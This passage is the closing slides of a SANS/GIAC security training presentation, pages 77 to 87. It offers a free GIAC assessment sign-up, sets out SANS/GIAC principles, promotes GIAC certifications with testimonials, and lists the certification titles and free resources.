• The penetration testing overview is related to SEC560: Network Penetration Testing and Ethical Hacking or GPEN.

• The incident handling overview is based on SEC504: Hacker Techniques, Exploits and Incident Handling or GCIH.

Page 77: Frontline solutions For Security Practitioners 1008


Free GIAC Assessment

• We’ve covered a lot of information today. To help reinforce what you’ve learned and test your knowledge, we have created a short 20 question assessment.

• If you would like to take advantage of this free GIAC assessment, please write your name and email address on the sign up sheet.

• Within the next 10 days, GIAC will send you an email with a link to access the assessment, but you will not be placed on our mailing list unless you opt-in.

Page 78: Frontline solutions For Security Practitioners 1008


SANS/GIAC Overview

Page 79: Frontline solutions For Security Practitioners 1008


SANS Training and GIAC Certifications

• SANS Institute is the leading training organization for system, audit, network, and security.

• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.

Page 80: Frontline solutions For Security Practitioners 1008


SANS and GIAC Guiding Principles

• Education
  – Current, evolving and proven material
  – Certifications that prove you have the knowledge and skills to get the job done

• Hands-On
  – Hands-on training conducted by instructors who are experts in their fields
  – Testing process that evaluates hands-on capabilities

• Community
  – Listening to and learning from the community’s needs
  – Giving vital knowledge back to the community

Page 81: Frontline solutions For Security Practitioners 1008


How SANS and GIAC Are Different From Other Training/Certifications

• SANS and GIAC constantly update course and certification information to keep you on top of current threats and vulnerabilities.

• We use real-world, hands-on scenarios.

• While tools are an important part of IT security, we teach you and validate actual skills, so you don’t have to rely solely on the performance of a tool.

• The SANS Promise - You will be able to apply our information security training the day you get back to the office.

Page 82: Frontline solutions For Security Practitioners 1008


GIAC Certification

GIAC Silver Certifications – Multiple choice exams only

GIAC Gold Certifications – Plus a written technical report

GIAC Platinum Series – Highest certification level

Page 83: Frontline solutions For Security Practitioners 1008


Top 3 Reasons to Earn Your GIAC Certification

1. Hiring managers use GIAC certifications to ensure that candidates actually possess deep technical skills

2. GIAC certifications help IT Security Professionals get promoted faster and earn more money

3. GIAC certification reinforces and affirms the 'hands on' knowledge you possess

Page 84: Frontline solutions For Security Practitioners 1008


What Certified People Say

"The GIAC certification has enabled me to take the next step in my Information Security career. It allowed me to prove that my value was more than just that of a security minded Sys Admin." – J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center

"The SANS hands-on experience and the intensive GIAC certification process has garnered me the respect of my boss and peers. Now, when I speak, people listen. I have the confidence to get the job done. My boss looks at me with respect that simply wasn't there before SANS training and GIAC certification. Not only my boss, but managers and peers at other large organizations." – Matt Carpenter, Enterprise Information Systems

GIAC certifications help IT Security Professionals get promoted faster and earn more money…

Page 85: Frontline solutions For Security Practitioners 1008


GIAC Certifications

• GSEC - Security Essentials
• GCFW - Firewall Analyst
• GCIA - Intrusion Analyst
• GCIH - Incident Handler
• GCFA - Forensics Analyst
• GCUX - Unix Security
• GCWN - Windows Security
• GNET - .NET
• GSOC - Securing Oracle
• GSSP-JAVA - Secure Coding
• GSSP-C - Secure Coding
• GISF - Information Security Fundamentals
• GSAE - Security Audit Essentials
• GSLC - Security Leadership
• GSNA - System & Network Auditor
• G7799 - ISO 17799/27001
• GISP - Information Security Professional
• GCIM - Incident Manager
• GAWN - Auditing Wireless Networks
• GREM - Reverse-Engineering Malware
• GPEN - Penetration Tester
• GCPM - IT Project Management

For a complete list of GIAC Certifications: http://www.giac.org/certifications/roadmap.php

Page 86: Frontline solutions For Security Practitioners 1008


Free Resources

• SANS and GIAC have a variety of free resources readily available at www.sans.org and www.giac.org

• Here’s a sample of what we offer:
  – Internet Storm Center
  – SANS Reading Room - http://www.sans.org/reading_room
  – Top 15 Malicious Spyware Actions
  – SANS Security Policy Samples
  – The Internet Guide to Popular Resources on Information Security
  – FAQs
  – SCORE
  – Security Tool White Papers and GIAC Gold Papers
  – Glossary of Security Terms

Page 87: Frontline solutions For Security Practitioners 1008


Questions: [email protected]@giac.org

Thank You!